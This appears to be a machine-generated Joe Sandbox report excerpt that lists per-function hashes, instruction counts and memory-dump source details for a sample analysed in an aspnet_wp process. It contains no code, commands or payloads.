Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
Instruction ID: 8755b6760b60c3b647498482a35390ee8a62ed40535c5813ea59f97b96bea948
Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
Instruction Fuzzy Hash: 33F04FB2A01615ABD324CF8D9840EA7F7EAEBD4A90F058169A555D7320EA31ED05CB90

Function 055A50D9 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd748eb2d254c361e76a22dddb1254b21bf0ddfeea4002e31c8c9c2fe56823f5
Instruction ID: c923bde32b68ea838dd0bdab44ad01ea865e085d46df7d5e9a70955f8ca8c625
Opcode Fuzzy Hash: bd748eb2d254c361e76a22dddb1254b21bf0ddfeea4002e31c8c9c2fe56823f5
Instruction Fuzzy Hash: 8E011EB1A10209ABDB00DF69D945DEEBBB8FF48714F50445AE901F7240E674A9018BA4

Function 0558F78A Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b74a0874ee9955ab1e90ca8520df7b86626788c0f1dee24cc127dd356cf6e97
Instruction ID: cfe2c6625046e95a33cee78fb593418669f5d13549c8804f719146ea7b36edda
Opcode Fuzzy Hash: 8b74a0874ee9955ab1e90ca8520df7b86626788c0f1dee24cc127dd356cf6e97
Instruction Fuzzy Hash: 0C0100B4E0064D9FDB04DFA9D545AAEBBF4FF48704F10445AA855E7341E674DA00CB91

Function 055A61E5 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8c6da844256ab194c22854924df84e7e65cd3ce5960eb7bd535feed65d93e98
Instruction ID: f668d272049d28a35442d7b661664a7d450a3ff260fbc527981cf6a85e219ed1
Opcode Fuzzy Hash: c8c6da844256ab194c22854924df84e7e65cd3ce5960eb7bd535feed65d93e98
Instruction Fuzzy Hash: 8D014F71E10249DFDB04DFA9D555AEEBBF8BF48714F14405AF901A7280EB74EA01CB98

Function 0555A4B0 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39554e2c4f5f33d3747c1001279c3f2d68dbeef3ac7d887c4ad916b41c83e339
Instruction ID: dffa2012b23395154dbe9c8326c0d9229e910619233c53b638ae344a71f645c0
Opcode Fuzzy Hash: 39554e2c4f5f33d3747c1001279c3f2d68dbeef3ac7d887c4ad916b41c83e339
Instruction Fuzzy Hash: A9018536110109AFCF129E84DC45EDA3FA6FB4C765F068202FE1966220C632E970EB81

Function 0550656A Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0ddc43ef1181e40871b2d712e9a548a0dd3f7a7339565d96b53b24a727ccef7
Instruction ID: 0c87d9e69a0a67b8fb840a1ec2e98c5ef87671195dbd4c81e4e0e832d5a13180
Opcode Fuzzy Hash: c0ddc43ef1181e40871b2d712e9a548a0dd3f7a7339565d96b53b24a727ccef7
Instruction Fuzzy Hash: 0F01AF70344B85DFE722DB6CCD4CF253BE9BB40B04F880595B9029BAE6EB68E4418A14

Function 054CC0F0 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abc33caa98344146c132e154078b527ae4e56e805c77a9b0bda2d7f5e6c0bb5d
Instruction ID: 7110eee58e8981552c3e2815a8fb2609891aad6a95d523319a0be11acc02973a
Opcode Fuzzy Hash: abc33caa98344146c132e154078b527ae4e56e805c77a9b0bda2d7f5e6c0bb5d
Instruction Fuzzy Hash: 89F0F67A3042015BE3A495168C81FF33AA6E7D0650F6580EFE6198B7C1EE70DC0187D4

Function 055A3749 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c86c39bdb6e5f373c63bc0b61fffc749c090866831c7dd43b14b299580d1563
Instruction ID: 8761bc9398c22862d2ef8d4781393621648e789506abebc52ddab287d4a1e100
Opcode Fuzzy Hash: 9c86c39bdb6e5f373c63bc0b61fffc749c090866831c7dd43b14b299580d1563
Instruction Fuzzy Hash: 47F04FB6A40208BFE711EB64CD41FEA77BCEB44714F000566B916D6190EA70AB44CB90

Function 055A55C9 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd3f56cd7dc8692059f661b9eaa6431edd2636734045376b8af0e57f8f5ab961
Instruction ID: 5f5330a77b3a5c2c4f8a55e6a1319eeaf4aada78d7d5c804632b054b809088a7
Opcode Fuzzy Hash: bd3f56cd7dc8692059f661b9eaa6431edd2636734045376b8af0e57f8f5ab961
Instruction Fuzzy Hash: 36F03C75A10249AFDB04EFA9D549E9EBBF4FF48300F50845AB845EB380EA74EA00CB54

Function 054D47FB Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0183ac773a87b137805aafb8324e10829cd4a7695941ddc75e0886d4e1732e0
Instruction ID: 0006825ccb511d1fe44f29b22c28defc08657bc9860dd06abf23ffd473967122
Opcode Fuzzy Hash: f0183ac773a87b137805aafb8324e10829cd4a7695941ddc75e0886d4e1732e0
Instruction Fuzzy Hash: 0DF096399156D09EDF21C758C06CFE3F7D5AB007A0F0469ABE44AC7601C7B4D840C661

Function 0558F6C7 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9c4702f81227160ea22bb955d369df34e5cc677c6423dd6124a1d013613fcc2
Instruction ID: 4ba9a6936c06b30bb003190a4dd74f188ab66a4d37f9dcbc51e97b83b878e3e5
Opcode Fuzzy Hash: c9c4702f81227160ea22bb955d369df34e5cc677c6423dd6124a1d013613fcc2
Instruction Fuzzy Hash: F1F06275A10648EFDB04EFA9D509EAEBBF4BF48304F004459E901EB281DA34E900CB54

Function 05590115 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b70957448df6602b833db526195de5dc2cf371c1a3e335f3c07570ef1dd9639a
Instruction ID: e78c97f352cae066fed7ba8065bf139b75392f0de15067e97b9dff67ec0a9ad2
Opcode Fuzzy Hash: b70957448df6602b833db526195de5dc2cf371c1a3e335f3c07570ef1dd9639a
Instruction Fuzzy Hash: B1F0277652AAC10ECF256B2C6C9D6F12FB5B781210F09188AD4A1AF250CE78C687E220

Function 0550C5ED Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01f9271815bbf126aadaaf33524baaf65f923da03ac08bc59097c05b7e512138
Instruction ID: 7c1712c28c07ea0a732651e60d61431a32d0e78365235164f93fd87820273248
Opcode Fuzzy Hash: 01f9271815bbf126aadaaf33524baaf65f923da03ac08bc59097c05b7e512138
Instruction Fuzzy Hash: 3FF0BE725166509BCB32D69CC148B61F3E5BB466A1F0CBA26D847C7592C360CC80CA91

Function 05512619 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
Instruction ID: bd4eeb1738803db8dcd94703a8b759a586bbc96792c8adbe96837f5c68eb1026
Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
Instruction Fuzzy Hash: ECE0D8323006006BE7219F5A8CC4F577B6EFFC2B10F04007DB9045F291CAE2DC0986A8

Function 055A547F Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efbb8b3178592a1d418d58f2dda33f36d4752fa761287afb05fd660fec674068
Instruction ID: 7a92445fc42943016c7b5ad1714771e11bca5265bdc3b5474494b6f94e176ea2
Opcode Fuzzy Hash: efbb8b3178592a1d418d58f2dda33f36d4752fa761287afb05fd660fec674068
Instruction Fuzzy Hash: 11F08271B11249ABEF04EBB9D55AE9E7BB8BF48704F510459E501EB380EA38E9008758

Function 055A54DB Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b8f284b9b41ac207cc90a5948827f861e4f9c23e580488f9b7cc6455303fbf9
Instruction ID: 63dce4d68c2999b1dda2990acd337a08513613bcab491062d9af5e95f4b446bd
Opcode Fuzzy Hash: 6b8f284b9b41ac207cc90a5948827f861e4f9c23e580488f9b7cc6455303fbf9
Instruction Fuzzy Hash: 75F08271A10249ABDF04EBB9D55AE9E7BF9BF48704F500459B501EB280EA34E9008718

Function 0558F72E Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f293aef5e763075f841538db18e96df20696f0fdda67f114b3ff8bae1a69e79c
Instruction ID: 171e704aa273a762dc10ac7de4ff7859263a003abe12e7a6df215c75dc3bc4ae
Opcode Fuzzy Hash: f293aef5e763075f841538db18e96df20696f0fdda67f114b3ff8bae1a69e79c
Instruction Fuzzy Hash: DAF08271A10649ABEB04EBB9D55AE9E7BB8FF48704F400459E502FB280D978E9018758

Function 055A51CB Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 878eb11081421937f5f6869820da83d31fb9b494227c4b498df0b95a502f931d
Instruction ID: cf3639460cb0743ea6d2f8f7a2ada6819466eb0134edb2dd77ecf85c012cafdd
Opcode Fuzzy Hash: 878eb11081421937f5f6869820da83d31fb9b494227c4b498df0b95a502f931d
Instruction Fuzzy Hash: BDF082B1B1024DABEF04EBB9D51AE6E7BB8BF44704F440459B902EB2C0FA74E900C758

Function 0554D070 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29a6642c7ef7ed3592a36acdccc95c3bae471711bc0d42908ddba4b2807d0017
Instruction ID: 171647e3272941cf28a20da791a00d73ff076f7c84932fd22b70bf1f8cc8ec60
Opcode Fuzzy Hash: 29a6642c7ef7ed3592a36acdccc95c3bae471711bc0d42908ddba4b2807d0017
Instruction Fuzzy Hash: 41F02B3360461467C231AA4E8C09FABFBACDBD5B70F20031ABA649B1D0DA70ED01C7D6

Function 05566030 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
Instruction ID: c4e3593dfff79806a4b36404776a8933fee33e962acc888af71915fd33437a8a
Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
Instruction Fuzzy Hash: 67F03072104244EFE3208F0AD944FA2BBE9FB05374F55C43AE6099B560D379EC40CBA4

Function 055055C0 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09511f6a5b3cabbe784265c74914248b525a176bb6667c193042ebcc910e885d
Instruction ID: 1ad06e1a1f580c4d9a2a2e89747efa44efb655a237451533c9c1ddb9aa38b2b1
Opcode Fuzzy Hash: 09511f6a5b3cabbe784265c74914248b525a176bb6667c193042ebcc910e885d
Instruction Fuzzy Hash: 93E0E533104614ABC6315E06D804F12BB6AFF907B0F118529A459175D09760F811CEE4

Function 054D0710 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
Instruction ID: c302a50450890847331cb4bef7e809f1e61076e9fc0132d5316a99781605f13e
Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
Instruction Fuzzy Hash: 7FF0E5393043549BDF16DF15C058EF5BBA9FB42350F0004A6E85A8F350E731E982CB90

Function 055A37B6 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 151fa3eda0d68173f6b84e2a92513b46d7512e2f74e79334ea38076815889cea
Instruction ID: 617e24fd3a320eb2629cf8daf963feb568f553dca945b3829b73a8f683afd57e
Opcode Fuzzy Hash: 151fa3eda0d68173f6b84e2a92513b46d7512e2f74e79334ea38076815889cea
Instruction Fuzzy Hash: 73E06D72210200BBE765DB59CD05FE673ACFB40765F150658B516930D0DAB0BE40CB64

Function 054D25E0 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a5f4bf432c94966d56c8882bf1941e5573cadb96e4b4e7244464fbada889de5d
Instruction ID: d2eca4099a8c91e33c53ccbc8cb76c95b62fc1ffc833f71e4db056e28f9639f3
Opcode Fuzzy Hash: a5f4bf432c94966d56c8882bf1941e5573cadb96e4b4e7244464fbada889de5d
Instruction Fuzzy Hash: 42E09232200A549BC712FF2ADD15FDABBAAEF90360F11451AF15657190CB70A950C7A8

Function 05554000 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
Instruction ID: 2afa09df6d1538bec7dc0a4f6c98957670ec4abb506e5aa156459328aba9ead0
Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
Instruction Fuzzy Hash: A6E0C234304305CFDB15CF19C054B6277B6BFD5A20F28C069A8498F209EB32E882CB40

Function 054D2050 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b57253a2ed8a91a58e589afba7448a34dc9dee905c4a552e41e77bf68006d6b
Instruction ID: 807167477c8cbb4d65567cb5cad5d21bca76978d44b88f91c39393d39b633122
Opcode Fuzzy Hash: 8b57253a2ed8a91a58e589afba7448a34dc9dee905c4a552e41e77bf68006d6b
Instruction Fuzzy Hash: 25E08C322005506BC612FA6EDD11E9AB7AAEF94260F10012AF15197290CA60AD40C7A4

Function 054CB562 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 513c018af8093926a425ffcf59a89caa6ba2b1d98b48f3b0c5e1abf4a0335a68
Instruction ID: b72611c1465fb46a8c252f3c1cdd9fd4977757a03b5a45a0d51a47d8295b01ef
Opcode Fuzzy Hash: 513c018af8093926a425ffcf59a89caa6ba2b1d98b48f3b0c5e1abf4a0335a68
Instruction Fuzzy Hash: 5DD05B31261650AFC7326F15ED09FC37EB5EFC0B11F4505AD7042265F08561ED44C694

Function 0550E59C Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
Instruction ID: 6c26ad840278ba7ea602d18ee24d750a85fc3e0ebff04e844a63a3990b99b2bb
Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
Instruction Fuzzy Hash: 1CD0A933208A20ABD732AA1CFC04FD333E9BB88725F16089AB009C7050C360EC81CA84

Function 054CA0E3 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
Instruction ID: b56632d335cb0ab5302ee511a645c56d8c165852cf286ad1f7f3894b6961ac70
Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
Instruction Fuzzy Hash: 21D0123731607497CB699A576D14FE76E16ABC1AA5F1A00EE740BA3900C5158C43D6E0

Function 0550C700 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
Instruction ID: 8ed3f02e1fe6b3ee0465592a837e59e606e60548939914287a571bbfc0589556
Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
Instruction Fuzzy Hash: C9C08C33290648AFC712EF99CD01F427BB9EB98B40F100462F3058B670C631FC20EA84

Function 054F340D Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 228d46562787cc6ef91b6aff40b17c30ce715ed8b58bcfbb69b93c396a4a2043
Instruction ID: 5e48437469ff61ba469c36a04ee81a8fe7b866b7212b9daba1ccfccd6f4f3b81
Opcode Fuzzy Hash: 228d46562787cc6ef91b6aff40b17c30ce715ed8b58bcfbb69b93c396a4a2043
Instruction Fuzzy Hash: B4C08C712415806AEB2B9F04CD04F7E3660FB00606F9409DDAB823A5A1C368E8029318

Function 054D0750 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
Instruction ID: 57933860f23efd20b79911b852d887545f01f2673096140435f34af94cb063d3
Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
Instruction Fuzzy Hash: 43C04879701A458FEF16DF6AD298FA977E8FB44741F1508D0E809DBB21E624F801CA10

Function 05514650 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77fa1aece742e2f63ca7ecb194c3ac1a4ad9566bc7ef10d77772c0c653cf9441
Instruction ID: 1b6dc92c2adb1f76e9e069873a72f1c36f93597bfa45f401c0fef943c3859e3f
Opcode Fuzzy Hash: 77fa1aece742e2f63ca7ecb194c3ac1a4ad9566bc7ef10d77772c0c653cf9441
Instruction Fuzzy Hash: B4900263601610424140719848454066055A7E23113D9C115A05545A4C8F1889559369

Function 05513010 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c71245890a619258f51899f122fd8e2bfcfbff389123362cebf771215f1f5bf
Instruction ID: a78c7305de2f448e75f6990b6d1e233e958a96782603e545b022962004be86e5
Opcode Fuzzy Hash: 3c71245890a619258f51899f122fd8e2bfcfbff389123362cebf771215f1f5bf
Instruction Fuzzy Hash: 0990022320195442D14072984845B0F415597E2212FD9C019A4156598CCE1589555721

Function 05513090 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 591bfa1e2e54a38bb02116575aff5c01a94bf8cc536379093eecb6eaa7cc8f68
Instruction ID: c809dae7f1f2fe2b0f3b10a2a68a9a5acebb035f279dc70011e9c756d16a3c1f
Opcode Fuzzy Hash: 591bfa1e2e54a38bb02116575aff5c01a94bf8cc536379093eecb6eaa7cc8f68
Instruction Fuzzy Hash: 3790022324151802D140719884557070056D7D1611F99C011A0024598D8F168A6567B1

Function 05514340 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9bf3b75c75984de5d69fe6f0a9aea612d47dabc68caca5f6aab3d44d4565872d
Instruction ID: ab051670d2e88dc8b4d83c801ca2849087e2dc22e3f2fa14ef159845da421f7a
Opcode Fuzzy Hash: 9bf3b75c75984de5d69fe6f0a9aea612d47dabc68caca5f6aab3d44d4565872d
Instruction Fuzzy Hash: 67900233605910129140719848C55464055A7E1311B99C011E0424598C8F148A565361

Function 05513D70 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 723cf9e5b19b40d5d08fe8bde2107fd34d779c0538cc7929cd2d4106cab40158
Instruction ID: a20217a5ad4154cde10f4e890e34f3d1368834edbecc3d8a6e8fe131f826c9b0
Opcode Fuzzy Hash: 723cf9e5b19b40d5d08fe8bde2107fd34d779c0538cc7929cd2d4106cab40158
Instruction Fuzzy Hash: E490023720151402D51071985845646009697D1311F99D411A042459CD8F5489A1A221

Function 05512D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 744aba869b768fb21f0735007c12407cf2c521bc66db325777ea0958ca56c2f6
Instruction ID: fd7b9c3b3a9cec7620cb3aad657a811053be4db3cc50c73d87ee10b3481e7099
